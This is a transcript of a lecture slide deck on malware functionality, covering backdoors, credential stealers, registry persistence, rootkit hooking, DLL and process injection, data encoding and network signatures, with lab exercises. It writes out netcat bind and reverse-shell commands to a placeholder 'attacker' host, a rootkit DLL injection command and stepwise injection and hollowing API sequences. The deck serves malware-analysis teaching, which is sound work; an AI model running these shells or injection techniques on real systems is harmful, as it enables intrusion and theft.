Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part 4: Malware Functionality

Published byGeorgina Cannon Modified over 9 years ago

Similar presentations

Presentation on theme: "Part 4: Malware Functionality"— Presentation transcript:

1 Part 4: Malware Functionality
Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network Signatures 1 1

2 Chapter 11: Malware Behavior
2 2

3 Common functionality 1. Downloaders 2. Backdoors
3. Credential stealers 4. Persistence mechanisms 5. Privilege escalation 6. Covering tracks (rootkits) 3 3

4 1. Downloaders Retrieve additional pieces of malware from network to execute Often packaged with an exploit In Windows, API call URLDownloadtoFileA used to download Followed by call WinExec to execute 4 4

5 2. Backdoor Malware that provides attacker with remote access to victim machine Most common type of malware Commonly use outgoing port 80 (HTTP) to blend in with other traffic Commonly implement reverse shells Allow attacker to execute commands as if they were on local system Examples: netcat, cmd.exe, remote administration tools 5 5

6 netcat On computer 1, execute program “echo hello” and redirect output to local netcat server on 8888 Connect to computer 1 at 8888 and redirect output to file foo.txt victim$ echo hello | nc –l –p 8888 attacker$ nc victim 8888 >foo.txt attacker$ cat foo.txt hello 6 6

7 netcat Backdoor shell listener Connecting to shell
victim$ nc –l –p 8888 –e /bin/sh attacker$ nc comp1 8888 7 7

8 Getting past firewalls and NAT
Or NAT Attacker Victim Connection Attempt X nc victim 8888 nc –l –p 8888 –e /bin/sh Another good reason why you might want to have an outbound firewall 8 8

9 netcat Bypass firewalls and NAT by “shoveling a shell”
Make attacker run listener Victim initiates outgoing connection (e.g. IRC, HTTP) attacker$ nc -l -p 8888 victim$ nc attacker e /bin/sh Attacker Firewall Victim Connection shovel Nc –l 8888 nc –l –p 8888 nc attacker 8888 –e /bin/sh 9 9

10 Windows reverse shells
cmd.exe equivalent to netcat CreateProcess Create a socket and connect it to server Tie stdin, stdout, and stderr of process to socket Multithreaded version can use CreateThread and CreatePipe 10 10

11 Remote administration tools
Similar to botnet command and control Victim beacons outside controller to receive instructions Example: Poison Ivy 11 11

12 3. Credential Stealers 3 main types Programs that monitor user logins
Programs that dump credentials stored in Windows (e.g. password hashes) that can be attacked off-line Programs that log keystrokes 12 12

13 Monitoring User Login Graphical Identification aNd Authentication (GINA) for Windows Login Winlogon process started Winlogon invokes GINA library code (msgina.dll) GINA requests credentials 13 13

14 Example: GINA interception
FakeGINA sits between Winlogon and msgina.dll (Figure 11-2) Exploits mechanism intended to allow other means of authentication Configured to run by setting a Windows registry key HKLM\SOFTWARE\...\Winlogon\GinaDLL set to fsgina.dll Winlogon process winlogon executes fakegina.dll requests credentials fakegina.dll passes credentials to msgina.dll Logout hooked to store credentials (Listing 11-1) 14 14

15 Dumping credentials Password storage Windows hashes
Typically, only hashes of passwords stored Users with forgotten passwords issued new ones Hash function well-known Dumping hashes allows dictionary attacks since users with weak passowrds subject to brute-force dictionary attacks off-line Windows hashes Security Account Manager (SAM) Local Security Authority Subsystem Service (LSASS) 15 15

16 Example: lsass dumping
Pwdump, Pass-the-Hash (PSH) toolkits Pwdump performs DLL injection on lsass.exe (Local Security Authority Subsystem Service) Injects lsaext.dll Uses GetHash call to extract hashes Can be easily changed to avoid signatures Listing 11-2 “GrabHash” variant 16 16

17 Logging keystrokes Records keystrokes so attacker can observe typed data Kernel-based keyloggers Built into keyboard drivers User-space keyloggers Use Windows API to hook I/O functions (SetWindowsHookEx) or poll for state of keys (GetForegroundWindow and GetAsyncKeyState) Example polling keylogger: Listing 11-4 17 17

18 4. Persistence Mechanisms
Methods to ensure survival of malware on a system Windows Registry persistence Trojaning DLL load-order hijacking 18 18

19 Windows registry persistence
Common key malware targets HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run + dozens more AppInit_DLLs Loaded into every process that loads User32.dll Stored in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Space delimited string of DLLs 19 19

20 Windows registry persistence
Common key malware targets Winlogon Hooking logged events (logon, logoff, startup, shutdown, lock screen) \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ When winlogon.exe generates an event, Windows checks the Notify registry key above for a DLL that will handle it SvcHost DLLs All services persist via registry svchost.exe – generic host process for services that run from DLLs \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost \HKLM\System\CurrentControlSet\Services\ServiceName 20 20

21 Trojaning Malware patches binary or library to add its functionality
Example: Nimda, Bliss Append code in existing section or in new section Change entry point to point to virus code Virus returns to target program after execution 21 21

22 Trojaning using the ELF header
typedef struct { unsigned char e_ident[EI_NIDENT]; Elf32_Half e_type; Elf32_Half e_machine; Elf32_Word e_version; Elf32_Addr e_entry; Elf32_Off e_phoff; Elf32_Off e_shoff; Elf32_Word e_flags; Elf32_Half e_ehsize; Elf32_Half e_phentsize; Elf32_Half e_phnum; Elf32_Half e_shentsize; Elf32_Half e_shnum; Elf32_Half e_shstrndx; } Elf32_Ehdr;  interesting! “This member gives the virtual address to which the system first transfers control, thus starting the process” We can change this to point elsewhere (not main() ) 22 22

23 Trojaning DLLs DllEntryPoint function tampering Table 11-1
pusha to save all registers in one instruction Look for popa to see return back to legitimate code Listing 11-5 23 23

24 Trojaning DLLs DLL load-order hijacking DLL search path in Windows
Directory from which application was loaded Current directory System directory (GetSystemDirectory function) 16-bit system directory Windows directory (GetWindowsDirectory function) Directories in PATH environment variable Rename malicious library and place high in path 24 24

25 5. Privilege escalation Most users run as local administrators
Malware uses privilege escalation for those that don't Exploit vulnerable code to obtain administrator privileges Many malware frameworks include such exploits (e.g. Access to restricted calls such as TerminateProcess and CreateRemoteThread 25 25

26 Using SeDebugPrivilege
Modify security token of a process using AdjustTokenPrivileges to obtain Initially used as a tool for system-level debugging Add SeDebugPrivilege to process (Listing 11-6) 26 26

27 6. Covering tracks – rootkits
Hide malicious activity Make malicious files, processes, network connections, and other resources invisible Most rootkits are kernel-mode to run at the same level as anti-virus/anti-malware 27 27

28 Function hooking Mechanism used to redirect function calls to injected attack code Replaces legitimate function with alternative one Two general methods Function table hooking Run-time data structures that contain function pointers that are invoked during program execution Hot patching function invocation (inline hooking) Modify JMP/CALL targets Modify function prologues to add detour to trampoline 28 28

29 IAT hooking Import Address Table (IAT) used to call functions in libraries Application code push <call parms> call [imp_InternetConnect] InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg 29 29

30 IAT hooking x Modify IAT to hijack a DLL call
Makes a hack ‘portable’ to other applications Load rootkit hook function into memory Replace target function’s address in the IAT with address of hook function Figure 11-4 Application code push <call parms> call [imp_InternetConnect] InternetConnect() push ebp lea ebp, [esp+var_5 8] sub esp, 29Ch Import Address Table jmp InternetConnect jmp InternetAutodial jmp InternetErrorDlg x Rootkit Code 30 30

31 IAT hooking Method Detection problems Locate import section from IAT
Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that function Locate IMAGE_THUNK_DATA which holds original address of imported function Replace address in IAT to point to your function and have your function eventually call the original Detection problems Legitimate hooking common Methods such as DLL forwarding makes benign vs. malicious hooks hard to discern Late binding Applications do late-demand binding where function addresses are not resolved until called Reduces amount of memory used But, won’t know what the legitimate values should be! 31 31

32 Example library hooks Processes rely on APIs provided by above
DLLs loaded at runtime into process address space Kernel32.dll, User32.dll, Gui32.dll, Advapi.dll Kernel32 loaded into private address space between 0x and 0x7FFE0000 Example: Hiding files in a directory Replace FindFirstFile(), FindNextFile() in Kernel32 to skip rootkit files Other DLLs DirectX/OpenGL APIs and time functions Typically hooked to implement cheating in on-line games Winsock API Hooked to monitor network traffic 32 32

33 Example library hook Hook keyboard/DirectInput APIs to obtain keyboard/mouse events GetKeyboardState(), GetKeyState(), GetDeviceState(), etc. SHORT WINAPI FakeGetAsyncKeyState(int vKey) { SHORT nResult = 0; if (g_bNeedMP) { if (vKey == VK_M) { nResult |= 0x8000; //’M’ pressed g_bNeedMP = FALSE; } else nResult = RealGetAsyncKeyState(vKey); //... return nResult; 33 33

34 Detours Library developed by Microsoft in 1999
Instrument and extend existing OS and application functionality simply G. Hunt, D. Brubacker, “Detours: Binary Interception of Win32 Functions”, 3rd USENIX Windows NT Symposium, July 1999. A programmer-friendly “feature” of Windows to easily patch functions Call hooks modify tables and can be detected by anti-virus/anti-rootkit technology Detours modify function in-line Malware uses to extend application with malicious functions Commonly used to add malicious DLLs into existing binaries on disk Adds a new .detour section into PE structure and modifies import address table using setdll tool in Detours library Targets include authentication check, DRM checks, anti- virus code, file system scans 34 34

35 Detour mechanism Detour and Trampoline Redirect function calls inline
Save initial instructions of function at the entry point Original bytes of function saved in trampoline Inject code (detour) to redirect execution to interceptor function (trampoline) Insert jump instruction into function directly Trampoline Implements 5 replaced bytes of original function Implements the function you want to execute jmps back to original target function plus 5 35 35

36 Detour details Replace function preamble with a 5-byte unconditional jmp Implement replaced instructions in trampoline code Before XP push ebp 8bec mov ebp, esp Hard to hook since you must disassemble user code After XP 8bff mov edi, edi Easy to hook, exactly 5 bytes MSFT intentionally did this to make hot patches easy More powerful than IAT hooking Do not have problems with binding time No matter how the function is called, your code will run Functions appearing in multiple tables are handled in one step Can be used for both kernel and user functions 36 36

37 Rest of original function
Detours Overwriting important code Must know which OS is being used Must also ensure no one else has tampered or patched the function already Must save the instructions being removed by detour Patching addresses Relative FAR JMP instruction target calculated at run-time Need to patch this with desired offset at run-time FAR JMP Rest of original function Rootkit code Removed instructions FAR JMP 37 37

38 Detour example Modify ZwDeviceIoControlFile to hide ports
Listing 11-7: Get pointer to code location of function to insert hook into eax Table 11-2: Define “hook byte” template (detour) Copy address of hooking function into template (memcpy) Listing 11-8: Call to install hook bytes into ZwDeviceIoControlFile call Hook bytes can be installed deep into function to avoid detection 38 38

39 Rootkit functions Disable or modify anti-virus process
Disable software updates Disable periodic “rehooking” code Modify network operations and services Modify boot loader Have boot loader apply patches to kernel before loading Modify on-disk kernel Modify boot loader to allow new kernel to pass integrity check Registering as a driver or boot service Load on boot via run key in registry Must hide key from anti-virus after being loaded 39 39

40 In-class exercise Lab 11-1
Use strings to identify potential target of malware Generate Figure 11-1L (Show TGAD section) Show Resource Hacker extracting TGAD In IDA Pro, show the routine that performs the extraction Generate Listing 11-2L in the extracted DLL Show Listing 11-3L and explain why a jmp is used Show Listing 11-4L and explain why a call is used Show Listing 11-5L and explain the purpose of msutil32.sys 40 40

41 Chapter 12: Covert Malware Launching
41 41

42 Covert Launching Methods
Launchers Process Injection Process Replacement Hook Injection Detours APC Injection 42 42

43 1. Launchers Malware that sets itself up for immediate or future covert execution Often contain malware that is to be executed in a resource section See previous Lab 11-01 Uses FindResource, LoadResource, and SizeofResource API calls to extract 43 43

44 2. Process Injection Inject code into another running process
Bypasses host-based firewalls and process-specific security mechanisms Force process to call VirtualAllocEx, then WriteProcessMemory to inject code Two injection types: DLL injection, direct injection 44 44

45 DLL injection Force remote process to load a malicious DLL
Most common covert loading technique Remotely inject code into process that calls LoadLibrary OS automatically executes DllMain of newly loaded libraries All actions appear to originate from compromised process Figure 12-1 45 45

46 DLL injection into running process
Part of the “idea” behind these features was accessibility tools 46 46

47 DLL injection Method #1 CreateToolhelp32Snapshot, Process32First, Process32Next API calls to search the process list for victim process Get PID of victim and use OpenProcess to obtain handle Allocate space for name of malicious DLL in victim process VirtualAllocEx allocates space in remote process if handle provided Call WriteProcessMemory to write string into victim process where VirtualAllocEx obtained space Call CreateRemoteThread to start a new thread in victim lpStartAddress : starting address of thread (set to address of LoadLibrary) lpParameter : argument for thread (point to above memory that stores name of malicious DLL Listing 12-1, Figure 12-2 J. Richter, “Load Your 32-bit DLL into Another Process’s Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5 47 47

48 DLL injection Method #2 Preserving original functionality Example tool
Allocate space in the victim process for code to inject DLL Write DLL injection code into the memory space of the victim Create or hijack a thread in the victim to run/load the DLL Clean up tracks Preserving original functionality Still need original functions to work correctly Injected DLL often set up to call original DLL to support desired functionality Interposed between application and real DLL Example tool Inject.exe (Aphex) C:\> inject.exe winlogon “myrootkit.dll” 48 48

49 DLL injection Method #2 using Windows Debug API
Attacker must have Debug programs rights on system Get debugger attached to process and run Break when you want to inject Obtain code to inject/load a DLL into memory space Analyze PE header to find a usable, writable part of memory for code ReadProcessMemory to save what is there WriteProcessMemory to write injection code Include INT 3 at end of injection code for debugger to stop Set EIP to start of code to inject a DLL and continue Breaks when DLL loaded, restore original state of memory (i.e. remove code to inject DLL) Even easier with a code cave (no need to save memory) to process and run 49 49

50 Communications Technology Lab
Code cave example Code cave Communications Technology Lab 50 50

51 Direct injection Similar to DLL injection, but write all code into victim process directly No DLL Requires custom code that will not disrupt victim process Often used to inject shellcode Mechanism Use VirtualAllocEx, WriteProcessMemory to write data used for subsequent call to CreateRemoteThread Use VirtualAllocEx and WriteProcessMemory again to allocate space for remote thread code Use CreateRemoteThread to execute 51 51

52 3. Process replacement Overwrite memory space of running process with malicious executable Disguise malware without risking crashes from partial injection Example: svchost.exe Start svchost in suspended state Pass CREATE_SUSPENDED as the dwCreationFlags parameter when calling CreateProcess (Listing 12-2, 12- 3) Release all memory using ZwUnmapViewOfSection Allocate memory for malicious code via VirtualAllocEx WriteProcessMemory to write malware sections SetThreadContext to fix entry point to point to malicious code ResumeThread to initiate malware Bypasses firewalls and intrusion prevention systems since svchost runs many network daemons 52 52

53 4. Hook Injection Interpose malware using Windows hooks Types of hooks
Hooks used to handle messages and events going to/from applications and operating system Use malicious hooks to run certain code whenever a particular message is intercepted (i.e. keystrokes) Use malicious hooks to ensure a particular DLL is loaded in a victim's memory space (i.e. process loaded event) Types of hooks Local hooks: observe and manipulate messages internally within process Remote hooks: observe and manipulate messages destined for a remote process 53 53

54 Example hooks Keyboard hooks Windows hooks Targeting threads
Registering hook code using WH_KEYBOARD or WH_KEYBOARD_LL hook procedure types to implement keyloggers Windows hooks Register hook with SetWindowsHookEx to capture window events Targeting threads Hooks must determine which thread to attach to Malware must include code to get dwThreadId of victim Search process listing to find Intrusion Prevention Systems look for suspicious hooks Listing 12-4 54 54

55 5. Detours See previous chapter Figure 12-4 55 55

56 Detours Example: MigBot
Detours two kernel functions: NtDeviceIoControlFile and SeAccessCheck Both are exported and have entries in the PE header 56 56

57 APC injection APC = Asynchronous Procedure Call Two forms
CreateRemoteThread requires overhead More efficient to invoke function on an existing thread Each thread has an APC function queue attached to it Threads execute all functions in APC queue when in an alertable state (i.e. swapped out) e.g. after calls to WaitForSingleObjectEx, WaitForMultipleObjectsEx, and SleepEx Malware performs APC injection to preempt threads in an alertable state to get immediate execution of their code Two forms Kernel-mode: APC generated for the system or a driver User-mode: APC generated for an application 57 57

58 APC injection from user space
One thread can queue a function to be invoked in another via API call QueueUserAPC WaitForSingleObjectEx is the most common call to the Windows API Listing 12-5: OpenThread followed by QueueUserAPC using LoadLibraryA on a malicious DLL (dbnet.dll) Note: calls to CreateToolhelp32Snapshot or ZwQuerySystemInformation, Process32First, Process32Next, Thread32First, and Thread32Next usually precede this snippet 58 58

59 APC injection from kernel space
Malicious drivers in kernel often would like to execute code in user space Listing 12-6: kernel code to inject an APC into user space 59 59

60 In-class exercise Lab 12-1 Show the imports and strings
Rename the three imports (see Listing 12-1L) Generate Listing 12-2L and explain what its function is Explain how Listing 12-4L uses what is performed in Listing 12-3L Use ProcessExplorer to show injection for Figure 12-1L Generate Listing 12-5L and explain the parameters 60 60

61 In-class exercise Lab 12-3
Show the imports that indicate the program's function Generate Listing 12-14L and explain what “fn” is Navigate fn to generate Listing 12-15L Follow the function called after a “KEYDOWN” event. What does the code in Listing 12-16L do? 61 61

62 Chapter 13: Data Encoding
62 62

63 Data Encoding Goal Methods
Defeat signature-detection by obfuscating malicious content Encrypt network communication Hide command and control location Hide staging file before transmission Hide from “strings” analysis Methods Simple Ciphers Common Cryptographic Algorithms Custom Encoding Decoding 63 63

64 Simple Ciphers Caesar Cipher XOR Shift/Rotate characters
Bit-wise XOR of data with a fixed byte or generated byte stream Figure 13-1 For a fixed byte XOR, can brute force all 256 values to find a header that makes sense (Table 13-1, Listing 13-2) Some malware uses null-preserving XOR to make detection less obvious Decoding loops easy to identify via searching for xor opcode Figure 13-2 64 64

65 Simple Ciphers Base-64 Represents binary data in an ASCII string format From MIME standard, Binary data converted into one of 64 primary characters [a-zA-Z0-9+/], = used for padding Every 3-bytes of binary data is encoded in 4- bytes of Base64 (Figure 13-4) A B C D E F G H I J K L M N O P Q R S T U V W X Y Z a b c d e f g h i j k l m n o p q r s t u v w x y z / Example: 3 byte binary = 4 byte Base64 = TWFu 65 65

66 Simple Ciphers Base-64 decoding
Look for a string used as an index table ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg hijklmnopqrstuvwxyz / Try on-line conversion tools ecode Caution: Malware can easily modify index table to create custom substitution ciphers very easily (see book example) 66 66

67 Common Cryptographic Algorithms
Use cryptographic ciphers to obfuscate strings Drawbacks Crypto libraries are large and easily detected Must hide the key for symmetric encryption algorithms Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions (Figure 13-9) Use of cryptographic constants (Figure 13-10) FindCrypt2 plugin in IDA Pro Krypto ANALyzer plugin for PEiD Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time) Must search for high-entropy content (Figure ) 67 67

68 Common Cryptographic Algorithms
Use cryptographic ciphers to obfuscate strings Drawbacks Crypto libraries are large and easily detected Must hide the key for symmetric encryption algorithms Recognizing encrypted code Imports include well-known OpenSSL or Microsoft functions (Figure 13-9) Use of cryptographic constants (Figure 13-10) FindCrypt2 plugin in IDA Pro Krypto ANALyzer plugin for PEiD Some malware employs crypto algorithms that do not have constants (RC4, IDEA generate at run-time) Must search for high-entropy content (Figure ) 68 68

69 Custom Encoding Hints Trace execution to see suspicious activity in a tight loop Example: pseudo-random number generation followed by xor (Figure 13-14, 13-15) 69 69

70 Decoding Self-decoding malware Malware employing decoding functions
Malware packaged with decoding routine Tell-tale sign: strings that don't appear in binary file on disk, but appear in debugger Decrypt by setting a breakpoint directly after decryption routine finishes execution Malware employing decoding functions Malware relies on system libraries to decode (i.e. Python's base64.decodestring() or PyCrypto's functions) Listing 13-10 OpenSSL calls 70 70

71 In-class exercise Lab 13-1 Show strings output
Show web request listed in Listing 13-1L in Wireshark (turn off promiscuous mode) In IDA Pro, search for all xor, then bring up Figure 13-1L, rename xorEncode Bring up xrefs to xorEncode to get to Listing 13-2L Bring up binary in PEView to find resource section with type and name listed in Listing 13-2L Install WinHex (winhex.com), open binary, and perform Figure 13-2L Install PEiD (softpedia.com) with caution (should be a Zip file), open binary, and run KANAL at bottom right arrow to obtain Listing 13-3L Bring up Figure 13-3L in IDA Pro From xref to top-level function, bring up and rename base64index function From xref to base64index, bring up Listing 13-4L What does the string in the URL being requested represent? 71 71

72 Chapter 14: Malware-Focused Network Signatures
72 72

73 Networking and Malware
Network Countermeasures Safely Investigating an Attacker Online Content-Based Network Countermeasures Combining Dynamic and Static Analysis Techniques Understanding the Attacker's Perspective 73 73

74 Network Countermeasures
IP connectivity Restrict network access using routers and firewalls DNS Reroute known malicious domains to an internal host (sinkhole) Content-filters Proxies, intrusion detection systems, an intrusion prevention systems for intercepting web requests in order to detect or prevent access 74 74

75 Network Countermeasures
Mine logs, alerts, and packet captures from forensic information No risk of infection when performing post-mortem analysis versus actively attempting to run malware Malware can be programmed to detect active analysis Indications of malicious activity Beacons to malicious sites, especially if done without DNS query OPSEC: Operations Security Take preventative measures to guard against Malware authors detecting you are on to them by embedding one-time use name Malware authors capturing information about you such as your home IP address or contacts 75 75

76 Safely Investigate an Attacker Online
Indirection Use network anonymizers such as Tor to hide yourself Use a virtual machine and virtual networks running through remote infrastructure (cellular, Amazon EC2, etc) IP address and DNS information See Regional Internet Registries to find out organizational assignment of IP blocks Query whois records of DNS names to find contact information metadata (domaintools.com) 76 76

77 Content-Based Network Countermeasures
Intrusion Detection with Snort Rules that link together elements that must be true to fire Size of payload, flag fields, specific settings of TCP/IP headers, HTTP headers, content in payload Table 14-1: Wefa7e's HTTP User-Agent p. 303 Snort rule to detect Wefa7e Variants of malware may tweak User-Agent Use regexps to modify rule 77 77

78 Combining Dynamic and Static Analysis Techniques
Steganography in protocols Attackers mimicking typical web requests Encoding commands in URLs and HTTP headers Encoding commands in meta-data of web pages Finding networking code to develop signatures WinSock API (WSAStartup, getaddrinfo, socket, connect, send, recv, WSAGetLastError) WinINet API (InternetOpen, InternetConnect, InternetOpenURL, InternetReadFile, InternetWriteFile, HTTPOpenRequest, HTTPQueryInfo, HTTPSendRequest COM interface (URLDownloadToFile, CoInitialize, CoCreateInstance, Navigate) Finding hard-coded patterns or stable content to create rules Reverse-engineering encoding or decoding scheme allows for accurate network signature generation 78 78

79 Understanding the Attacker's Perspective
Attackers will slightly change payloads to avoid detection Strategies Focus on elements that are part of both endpoints Focus on elements of protocol known to be part of a key (see above) Operate at a level that is different than other defenders (so that an attacker side-stepping another filter will not affect yours) 79 79

80 In-class exercise Lab 14-1
Run malware and capture the HTTP request it produces shown in Listing 14-1L. Is it different? Find the networking API call this malware uses for its request in IDA Pro Find where the URL string template is stored Generate Figure 14-1L Generate Figure 14-2L by redefining data location where string is stored Locate where the two parts of the URL string are generated (in the %s-%s sprintf) Map out how the character “6” is generated in the encoded URL How could malware break the first Snort rule shown? 80 80

Download ppt "Part 4: Malware Functionality"

Similar presentations

ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.

ITIS 1210 Introduction to Web-Based Information Systems Chapter 44 How Firewalls Work How Firewalls Work.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Operating System Security : David Phillips A Study of Windows Rootkits.

Operating System Security : David Phillips A Study of Windows Rootkits.
Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network.

Part 4: Malware Functionality Chapter 11: Malware Behavior Chapter 12: Covert Malware Launching Chapter 13: Data Encoding Chapter 14: Malware-focused Network.
Operating-System Structures

Operating-System Structures
1 Detection of Injected, Dynamically Generated, and Obfuscated Malicious Code (DOME) Subha Ramanathan & Arun Krishnamurthy Nov 15, 2005.

1 Detection of Injected, Dynamically Generated, and Obfuscated Malicious Code (DOME) Subha Ramanathan & Arun Krishnamurthy Nov 15, 2005.
Web Defacement Anh Nguyen May 6 th, 2010. Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.

Web Defacement Anh Nguyen May 6 th, Organization Introduction How Hackers Deface Web Pages Solutions to Web Defacement Conclusions 2.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Security Awareness: Applying Practical Security in Your World

Security Awareness: Applying Practical Security in Your World
Exam ● On May 15, at 10:30am in this room ● Two hour exam ● Open Notes ● Will mostly cover material since Exam 2 ● No, You may not take it early.

Exam ● On May 15, at 10:30am in this room ● Two hour exam ● Open Notes ● Will mostly cover material since Exam 2 ● No, You may not take it early.
Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.

Network Security. Network security starts from authenticating any user. Once authenticated, firewall enforces access policies such as what services are.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
ROOT KITS. Overview History What is a rootkit? Rootkit capabilities Rootkits on windows OS Rootkit demo Detection methodologies Good tools for detection.

ROOT KITS. Overview History What is a rootkit? Rootkit capabilities Rootkits on windows OS Rootkit demo Detection methodologies Good tools for detection.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.

Hands-On Microsoft Windows Server 2008 Chapter 8 Managing Windows Server 2008 Network Services.
TDL3 Rootkit A Sans NewsBite Analysis by Marshall Washburn.

TDL3 Rootkit A Sans NewsBite Analysis by Marshall Washburn.
Video Following is a video of what can happen if you don’t update your security settings! security.

Video Following is a video of what can happen if you don’t update your security settings! security.
1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.

1 Chap 10 Malicious Software. 2 Viruses and ”Malicious Programs ” Computer “Viruses” and related programs have the ability to replicate themselves on.
1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.

1 Infrastructure Hardening. 2 Objectives Why hardening infrastructure is important? Hardening Operating Systems, Network and Applications.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)

Similar presentations

Ads by Google